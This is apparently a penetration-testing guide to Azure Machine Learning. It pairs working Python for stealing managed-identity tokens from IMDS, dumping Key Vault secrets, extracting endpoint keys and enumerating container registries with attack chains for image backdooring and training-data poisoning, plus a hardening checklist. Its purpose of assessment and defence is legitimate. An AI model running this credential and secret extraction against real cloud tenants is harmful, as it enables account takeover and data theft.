Azure ML Attack Surface
Security assessment of Azure Machine Learning -- managed identity exploitation, workspace security, compute instance attacks, and endpoint vulnerabilities.
Azure ML Architecture
Azure Machine Learning organizes resources around workspaces. Each workspace connects to Azure storage, Key Vault, Container Registry, and Application Insights.
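Those four dependent services are recorded as ARM resource IDs on the workspace resource itself, so one authenticated GET maps the blast radius of a workspace compromise. A minimal sketch against the ARM REST API -- the function names and workspace identifiers are illustrative, and the property names assume the documented `Microsoft.MachineLearningServices/workspaces` schema:

```python
import requests

ARM = "https://management.azure.com"

def workspace_url(subscription_id, resource_group, workspace_name,
                  api_version="2023-10-01"):
    """Build the ARM URL for an Azure ML workspace resource."""
    return (
        f"{ARM}/subscriptions/{subscription_id}"
        f"/resourceGroups/{resource_group}"
        f"/providers/Microsoft.MachineLearningServices/workspaces/{workspace_name}"
        f"?api-version={api_version}"
    )

def linked_resources(workspace_json):
    """Extract the ARM resource IDs of the services a workspace depends on."""
    props = workspace_json.get("properties", {})
    fields = ("storageAccount", "keyVault", "containerRegistry", "applicationInsights")
    return {f: props.get(f) for f in fields}

def map_blast_radius(token, subscription_id, resource_group, workspace_name):
    """Fetch the workspace (requires a valid ARM token) and print its dependencies."""
    url = workspace_url(subscription_id, resource_group, workspace_name)
    ws = requests.get(url, headers={"Authorization": f"Bearer {token}"}).json()
    for name, resource_id in linked_resources(ws).items():
        print(f"{name}: {resource_id or 'not configured'}")
```

Each returned ID is a full ARM path, so the output doubles as a target list for the techniques below.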
Attack Surface Map
| Component | Identity | Storage | Network Exposure |
|---|---|---|---|
| Compute Instances | Managed Identity/User | Workspace storage | VNet optional |
| Online Endpoints | Managed Identity | Model in ACR/Blob | Internet-facing |
| Batch Endpoints | Managed Identity | Blob input/output | VNet optional |
| Datastores | Workspace MI | Blob/ADLS/SQL | Workspace VNet |
| Pipelines | Pipeline MI | Blob artifacts | Workspace VNet |
Attack Techniques
1. Managed Identity Exploitation
Azure ML compute instances are assigned managed identities (system-assigned or user-assigned) that authenticate to Azure services without storing credentials. When these identities are overprivileged -- a common misconfiguration since ML workflows touch many services -- compromising a compute instance grants broad access across the Azure subscription.
The Instance Metadata Service (IMDS) at 169.254.169.254 is the primary token source. Unlike AWS IMDSv2, Azure IMDS requires only a static `Metadata: true` header rather than a PUT-based session-token exchange, so any code running on the instance can harvest credentials with a single GET.
import requests
# From inside an Azure ML compute instance
# Get token for the managed identity
token_url = "http://169.254.169.254/metadata/identity/oauth2/token"
params = {
"api-version": "2018-02-01",
"resource": "https://management.azure.com/"
}
headers = {"Metadata": "true"}
resp = requests.get(token_url, params=params, headers=headers)
token = resp.json()["access_token"]
# Use the token to enumerate Azure resources
mgmt_url = "https://management.azure.com/subscriptions?api-version=2020-01-01"
subs = requests.get(mgmt_url, headers={"Authorization": f"Bearer {token}"}).json()
for sub in subs.get("value", []):
    print(f"Subscription: {sub['displayName']} ({sub['subscriptionId']})")

Lateral Movement via Managed Identity
Once you have a token, enumerate what the managed identity can reach. Common overprivilege patterns include Contributor-level access to the resource group (granting access to all sibling resources), Storage Blob Data Contributor on storage accounts containing non-ML data, and Key Vault Secrets Officer across multiple vaults.
import requests
def enumerate_role_assignments(token, subscription_id):
    """List role assignments visible at the subscription scope."""
url = (
f"https://management.azure.com/subscriptions/{subscription_id}"
f"/providers/Microsoft.Authorization/roleAssignments"
f"?api-version=2022-04-01"
)
headers = {"Authorization": f"Bearer {token}"}
resp = requests.get(url, headers=headers).json()
for assignment in resp.get("value", []):
props = assignment["properties"]
print(f"Role: {props['roleDefinitionId'].split('/')[-1]}")
print(f" Scope: {props['scope']}")
print(f" Principal: {props['principalId']}")
print()
def get_token_for_resource(resource_url):
"""Get a managed identity token scoped to a specific resource."""
resp = requests.get(
"http://169.254.169.254/metadata/identity/oauth2/token",
params={"api-version": "2018-02-01", "resource": resource_url},
headers={"Metadata": "true"}
)
return resp.json()["access_token"]
# Get tokens for different Azure services
mgmt_token = get_token_for_resource("https://management.azure.com/")
storage_token = get_token_for_resource("https://storage.azure.com/")
vault_token = get_token_for_resource("https://vault.azure.net")
graph_token = get_token_for_resource("https://graph.microsoft.com/")

2. Workspace Data Store Enumeration
Azure ML workspaces connect to multiple data stores -- Azure Blob Storage, Azure Data Lake Storage (ADLS Gen2), Azure SQL Database, and Azure Database for PostgreSQL. Each datastore registration stores connection details and credentials that can be extracted.
from azure.ai.ml import MLClient
from azure.identity import DefaultAzureCredential
ml_client = MLClient(
DefaultAzureCredential(),
subscription_id="...",
resource_group_name="...",
workspace_name="..."
)
# List all datastores
for ds in ml_client.datastores.list():
print(f"Datastore: {ds.name} (type: {ds.type})")
if hasattr(ds, 'account_name'):
print(f" Storage: {ds.account_name}/{ds.container_name}")
# List registered models
for model in ml_client.models.list():
    print(f"Model: {model.name} v{model.version}")

Deep Datastore Inspection
Beyond listing datastores, extract their connection credentials and probe what data is accessible. Datastores that use account keys (rather than managed identity passthrough) store those keys in the workspace's Key Vault.
from azure.ai.ml import MLClient
from azure.identity import DefaultAzureCredential
ml_client = MLClient(
DefaultAzureCredential(),
subscription_id="...",
resource_group_name="...",
workspace_name="..."
)
# Get detailed datastore info including credential type
for ds in ml_client.datastores.list():
detail = ml_client.datastores.get(ds.name)
print(f"\nDatastore: {detail.name}")
print(f" Type: {detail.type}")
# Check credential type -- account_key vs identity-based
if hasattr(detail, 'credentials'):
cred_type = type(detail.credentials).__name__
print(f" Credential type: {cred_type}")
    # For blob datastores, try to list a sample of contents
    from azure.ai.ml.entities import AzureBlobDatastore
    if isinstance(detail, AzureBlobDatastore):
        from azure.storage.blob import BlobServiceClient
        blob_client = BlobServiceClient(
            f"https://{detail.account_name}.blob.core.windows.net",
            credential=DefaultAzureCredential()
        )
        container = blob_client.get_container_client(detail.container_name)
        print("  Sample contents:")
        for i, blob in enumerate(container.list_blobs()):
            if i >= 5:  # list_blobs() pages through everything; stop at a sample
                break
            print(f"    {blob.name} ({blob.size} bytes)")
# Enumerate environments (container images used for training/inference)
for env in ml_client.environments.list():
print(f"Environment: {env.name} v{env.version}")
if hasattr(env, 'image'):
print(f" Image: {env.image}")
# List compute targets -- potential pivot points
for compute in ml_client.compute.list():
    # ComputeInstance exposes .state; other compute types only have provisioning_state
    state = getattr(compute, "state", None) or compute.provisioning_state
    print(f"Compute: {compute.name} (type: {compute.type}, state: {state})")

3. Endpoint Authentication Testing
Azure ML online endpoints support two authentication modes: key-based (a static API key) and Azure AD token-based. Misconfigurations include endpoints deployed with authentication disabled, keys that are never rotated, or overly broad CORS policies.
import requests
# Test if endpoint requires authentication
endpoint_url = "https://my-endpoint.westus2.inference.ml.azure.com/score"
# Attempt unauthenticated access
resp = requests.post(endpoint_url, json={"data": [[1,2,3]]})
print(f"No auth: {resp.status_code}")
# Attempt with a stolen/guessed key
resp = requests.post(
endpoint_url,
json={"data": [[1,2,3]]},
headers={"Authorization": "Bearer <key>"}
)
print(f"With key: {resp.status_code}")

Advanced Endpoint Probing
import requests
import json
def probe_endpoint(endpoint_url, keys=None):
"""Comprehensive endpoint security assessment."""
results = {}
# Test authentication modes
results["no_auth"] = requests.post(
endpoint_url, json={"data": [[1,2,3]]}
).status_code
# Test with OPTIONS to check CORS
results["cors"] = requests.options(endpoint_url).headers.get(
"Access-Control-Allow-Origin", "not set"
)
# Test Swagger/OpenAPI endpoint (often exposed)
swagger_url = endpoint_url.replace("/score", "/swagger.json")
swagger_resp = requests.get(swagger_url)
results["swagger_exposed"] = swagger_resp.status_code == 200
if results["swagger_exposed"]:
results["swagger_paths"] = list(swagger_resp.json().get("paths", {}).keys())
# Test health endpoint
health_url = endpoint_url.replace("/score", "/")
results["health"] = requests.get(health_url).status_code
# Test for verbose error messages (information disclosure)
malformed_resp = requests.post(
endpoint_url,
data="not json",
headers={"Content-Type": "application/json",
"Authorization": f"Bearer {keys[0]}" if keys else ""}
)
results["error_verbosity"] = len(malformed_resp.text)
results["error_sample"] = malformed_resp.text[:500]
return results
# Enumerate all endpoints and probe each
from azure.ai.ml import MLClient
from azure.identity import DefaultAzureCredential
ml_client = MLClient(
DefaultAzureCredential(),
subscription_id="...",
resource_group_name="...",
workspace_name="..."
)
for endpoint in ml_client.online_endpoints.list():
print(f"\n=== Endpoint: {endpoint.name} ===")
print(f" Auth mode: {endpoint.auth_mode}")
print(f" Scoring URI: {endpoint.scoring_uri}")
# Get endpoint keys if key-based auth
if endpoint.auth_mode == "key":
keys = ml_client.online_endpoints.get_keys(endpoint.name)
print(f" Primary key: {keys.primary_key[:10]}...")
        print(f"  Secondary key: {keys.secondary_key[:10]}...")

4. Key Vault Secret Extraction
Every Azure ML workspace creates an associated Azure Key Vault. This vault stores datastore credentials, API keys, custom secrets set by data scientists, and connection strings. The workspace's managed identity typically has broad access to this vault, making it a high-value target after initial compute compromise.
from azure.keyvault.secrets import SecretClient
from azure.identity import DefaultAzureCredential
# Azure ML workspaces have an associated Key Vault
kv_client = SecretClient(
vault_url="https://my-workspace-kv.vault.azure.net/",
credential=DefaultAzureCredential()
)
# List and read secrets
for secret in kv_client.list_properties_of_secrets():
print(f"Secret: {secret.name}")
value = kv_client.get_secret(secret.name)
    print(f"  Value: {value.value[:50]}...")

Comprehensive Key Vault Enumeration
from azure.keyvault.secrets import SecretClient
from azure.keyvault.keys import KeyClient
from azure.keyvault.certificates import CertificateClient
from azure.identity import DefaultAzureCredential
credential = DefaultAzureCredential()
vault_url = "https://my-workspace-kv.vault.azure.net/"
# Enumerate secrets
secret_client = SecretClient(vault_url=vault_url, credential=credential)
print("=== Secrets ===")
for secret in secret_client.list_properties_of_secrets():
print(f" {secret.name} (enabled: {secret.enabled}, "
f"created: {secret.created_on})")
# Categorize by naming convention
if any(kw in secret.name.lower() for kw in
['connection', 'storage', 'sql', 'password', 'key', 'token']):
print(f" [HIGH VALUE] Likely credential or connection string")
# Enumerate keys (used for encryption, signing)
key_client = KeyClient(vault_url=vault_url, credential=credential)
print("\n=== Keys ===")
for key_props in key_client.list_properties_of_keys():
    # KeyProperties does not carry type/ops -- fetch the full key for those
    key = key_client.get_key(key_props.name)
    print(f"  {key.name} (type: {key.key_type}, ops: {key.key.key_ops})")
# Enumerate certificates
cert_client = CertificateClient(vault_url=vault_url, credential=credential)
print("\n=== Certificates ===")
for cert in cert_client.list_properties_of_certificates():
    print(f"  {cert.name} (expires: {cert.expires_on})")

5. Container Registry Exploitation
Azure ML workspaces use Azure Container Registry (ACR) to store Docker images for training and inference environments. Compromising ACR access enables model supply chain attacks -- replacing legitimate inference images with backdoored versions.
import requests
def get_acr_token(acr_url, acr_name, refresh_token, scope):
    """Exchange an ACR refresh token for an access token with a specific scope."""
    resp = requests.post(f"{acr_url}/oauth2/token", data={
        "grant_type": "refresh_token",
        "service": f"{acr_name}.azurecr.io",
        "scope": scope,
        "refresh_token": refresh_token
    })
    return resp.json()["access_token"]

def enumerate_acr(acr_name, aad_token):
    """Enumerate repositories and images in Azure Container Registry."""
    acr_url = f"https://{acr_name}.azurecr.io"
    # Exchange the AAD token (from the managed identity) for an ACR refresh token
    exchange_resp = requests.post(f"{acr_url}/oauth2/exchange", data={
        "grant_type": "access_token",
        "service": f"{acr_name}.azurecr.io",
        "access_token": aad_token
    })
    refresh_token = exchange_resp.json()["refresh_token"]
    # Catalog listing requires an access token scoped to registry:catalog:*
    catalog_token = get_acr_token(acr_url, acr_name, refresh_token, "registry:catalog:*")
    repos = requests.get(
        f"{acr_url}/v2/_catalog",
        headers={"Authorization": f"Bearer {catalog_token}"}
    ).json()
    for repo in repos.get("repositories", []):
        print(f"Repository: {repo}")
        # Tag and manifest reads need a repository-scoped pull token
        repo_token = get_acr_token(acr_url, acr_name, refresh_token,
                                   f"repository:{repo}:pull")
        tags = requests.get(
            f"{acr_url}/v2/{repo}/tags/list",
            headers={"Authorization": f"Bearer {repo_token}"}
        ).json()
        for tag in tags.get("tags", [])[:5]:
            print(f"  Tag: {tag}")
            # Get manifest for image analysis
            manifest = requests.get(
                f"{acr_url}/v2/{repo}/manifests/{tag}",
                headers={
                    "Authorization": f"Bearer {repo_token}",
                    "Accept": "application/vnd.docker.distribution.manifest.v2+json"
                }
            ).json()
            print(f"    Layers: {len(manifest.get('layers', []))}")

6. Network Isolation Assessment
Azure ML supports VNet integration, but many deployments use the default configuration without network isolation. Even when VNet integration is enabled, misconfigured network security groups (NSGs) and missing private endpoints create attack paths.
import requests
def assess_network_isolation(token, subscription_id, resource_group, workspace_name):
"""Assess whether an Azure ML workspace has proper network isolation."""
base_url = "https://management.azure.com"
headers = {"Authorization": f"Bearer {token}"}
# Get workspace details
ws_url = (
f"{base_url}/subscriptions/{subscription_id}"
f"/resourceGroups/{resource_group}"
f"/providers/Microsoft.MachineLearningServices"
f"/workspaces/{workspace_name}"
f"?api-version=2023-10-01"
)
ws = requests.get(ws_url, headers=headers).json()
props = ws.get("properties", {})
results = {
"public_network_access": props.get("publicNetworkAccess", "Unknown"),
"private_endpoints": [],
"managed_network": props.get("managedNetwork", {}),
}
# Check for private endpoint connections
pe_connections = props.get("privateEndpointConnections", [])
for pe in pe_connections:
pe_props = pe.get("properties", {})
results["private_endpoints"].append({
"name": pe.get("name"),
"status": pe_props.get("privateLinkServiceConnectionState", {}).get("status")
})
# Assess risk
if results["public_network_access"] == "Enabled":
print("[CRITICAL] Public network access is enabled")
if not results["private_endpoints"]:
print("[HIGH] No private endpoints configured")
    return results

Defensive Assessment Checklist
When assessing Azure ML security posture, verify these controls:
| Control Area | What to Check | MITRE ATLAS Reference |
|---|---|---|
| Identity | Managed identity scope, conditional access policies, RBAC assignments | AML.T0003 (ML Model Access) |
| Network | VNet integration, private endpoints, NSG rules, public endpoint exposure | AML.T0002 (Active Scanning) |
| Data | Storage encryption, datastore credential type, blob public access | AML.T0008 (Collection) |
| Compute | Instance isolation, SSH access, idle shutdown, patching | AML.T0004 (Full Model Access) |
| Registry | ACR access controls, image signing, vulnerability scanning | AML.T0018 (Backdoor ML Model) |
| Secrets | Key Vault access policies, secret rotation, soft-delete enabled | AML.TA0008 (Collection) |
| Monitoring | Diagnostic settings, Azure Sentinel integration, audit logs | AML.TA0006 (Defense Evasion) |
Recommended Hardening
- Use user-assigned managed identities with least-privilege RBAC instead of system-assigned identities with broad scope.
- Enable VNet integration with private endpoints for the workspace, storage accounts, Key Vault, and ACR.
- Set `publicNetworkAccess` to `Disabled` on all workspace resources.
- Use credential passthrough for datastores instead of storing account keys in Key Vault.
- Enable ACR content trust and scan images for vulnerabilities before deployment.
- Enforce `auth_mode: aad_token` on endpoints rather than key-based authentication.
- Enable Azure Sentinel with the ML workspace diagnostic settings for security monitoring.
- Rotate endpoint keys on a regular schedule and after any suspected compromise.
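Several of these controls can be checked mechanically. A minimal audit sketch, assuming as inputs the workspace's ARM JSON (as fetched in the network isolation assessment above) and a list of endpoint descriptions with hypothetical `name`/`auth_mode` keys:

```python
def audit_workspace(ws_json, endpoints):
    """Flag deviations from the hardening recommendations above.

    ws_json is the workspace's ARM JSON; endpoints is a list of dicts with
    "name" and "auth_mode" keys -- both input shapes are assumptions
    chosen for illustration.
    """
    findings = []
    props = ws_json.get("properties", {})
    if props.get("publicNetworkAccess", "Enabled") != "Disabled":
        findings.append("publicNetworkAccess is not Disabled")
    if not props.get("privateEndpointConnections"):
        findings.append("no private endpoints configured")
    for ep in endpoints:
        if ep.get("auth_mode") == "key":
            findings.append(f'endpoint {ep.get("name")} uses key-based auth')
    return findings
```

An empty findings list means these particular checks pass; it does not replace a full review of RBAC, NSGs, and diagnostic settings.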
Common Attack Chains
Real-world Azure ML engagements typically combine multiple techniques. Here are common attack chains ordered by impact:
Chain 1: Compute to Subscription Takeover
1. Initial access via malicious notebook or compromised data scientist credentials
2. Extract managed identity token from IMDS (169.254.169.254)
3. Enumerate role assignments to discover overprivileged identity
4. Access Key Vault secrets (storage keys, API credentials, connection strings)
5. Use storage keys to access blob containers across the subscription
6. Discover secrets in non-ML Key Vaults shared by the managed identity
7. Pivot to databases, APIs, or other services using extracted credentials

Chain 2: Model Supply Chain Attack
1. Enumerate ACR repositories via workspace managed identity
2. Identify inference container images used by production endpoints
3. Pull the target image, inject a backdoor (data exfiltration layer)
4. Push the modified image with the same tag (no immutability)
5. Trigger endpoint redeployment (or wait for next scheduled update)
6. Backdoored model now exfiltrates inference data to attacker C2

Chain 3: Training Pipeline Manipulation
1. Access workspace via compromised compute instance
2. Enumerate datastores and identify training data locations
3. Modify training data in blob storage to inject backdoor examples
4. Wait for scheduled retraining pipeline to execute
5. Backdoored model is registered in model registry
6. Backdoored model is deployed to production endpoint

MITRE ATLAS Mapping for Azure ML Attacks
| Attack Technique | ATLAS ID | Azure ML-Specific Context |
|---|---|---|
| IMDS managed identity token extraction | AML.TA0002 (Initial Access) | Workspace MI with broad RBAC scope |
| Datastore enumeration | AML.T0000 (Search for Victim's Data) | Registered datastores reveal all connected storage |
| Endpoint probing | AML.T0002 (Active Scanning) | Endpoints may use key-based auth without rotation |
| Model extraction via endpoint | AML.T0024 (Model Extraction) | Online endpoints serving model predictions |
| ACR image tampering | AML.T0018 (Backdoor ML Model) | Replace training/inference images in ACR |
| Key Vault lateral movement | AML.TA0008 (Collection) | Workspace Key Vault stores cross-service secrets |
| Training data poisoning via blob | AML.T0020 (Data Poisoning) | Modify training data in connected blob storage |
Cross-Platform Comparison
| Attack Vector | Azure ML | AWS SageMaker | GCP Vertex AI |
|---|---|---|---|
| Credential source | IMDS (managed identity) | IMDS (IAM role) | Metadata server (SA token) |
| Primary storage | Blob Storage / ADLS | S3 | GCS |
| Container registry | Azure Container Registry | Amazon ECR | Artifact Registry |
| Secret management | Key Vault (auto-created) | Secrets Manager / SSM | Secret Manager |
| Network isolation | VNet + Private Endpoints | VPC + VPC Endpoints | VPC-SC + Private Google Access |
| Biggest risk | Key Vault cross-service exposure | IAM role overprivilege | Service account Editor role |
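For detection engineering, the credential-source row of the table translates directly into egress and alerting rules. A small reference map of the three metadata endpoints -- URLs and headers reflect each platform's documented defaults, so verify against current docs before relying on them:

```python
# Instance metadata endpoints that yield cloud credentials on each platform.
# Blocking or alerting on these from ML workloads catches token harvesting.
METADATA_CREDENTIAL_SOURCES = {
    "azure": {
        "url": "http://169.254.169.254/metadata/identity/oauth2/token",
        "headers": {"Metadata": "true"},
        "note": "single GET; 'resource' query parameter selects the token audience",
    },
    "aws": {
        "url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/",
        "headers": {"X-aws-ec2-metadata-token": "<session token>"},
        "note": "IMDSv2 first requires PUT /latest/api/token to mint a session token",
    },
    "gcp": {
        "url": ("http://metadata.google.internal/computeMetadata/v1/"
                "instance/service-accounts/default/token"),
        "headers": {"Metadata-Flavor": "Google"},
        "note": "single GET; returns an OAuth2 access token for the attached SA",
    },
}
```

Note that Azure and AWS share the 169.254.169.254 link-local address, while GCP uses a hostname; all three require a header that browsers will not send, which is why SSRF-based harvesting usually needs header injection.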
Related Topics
- Cloud AI Infrastructure -- Cross-platform overview
- GCP Vertex AI -- GCP comparison
- AWS SageMaker -- AWS comparison
References
- Azure Machine Learning Security Baseline - Microsoft (2024) - Official security configuration guidance
- "Securing Azure Machine Learning Workspaces" - Microsoft Learn (2024) - Workspace isolation and access control
- "Managed Identity Best Practices" - Microsoft (2024) - Guidance on limiting managed identity scope
- "Azure Security Benchmark v3" - Microsoft (2023) - Cross-service security controls applicable to Azure ML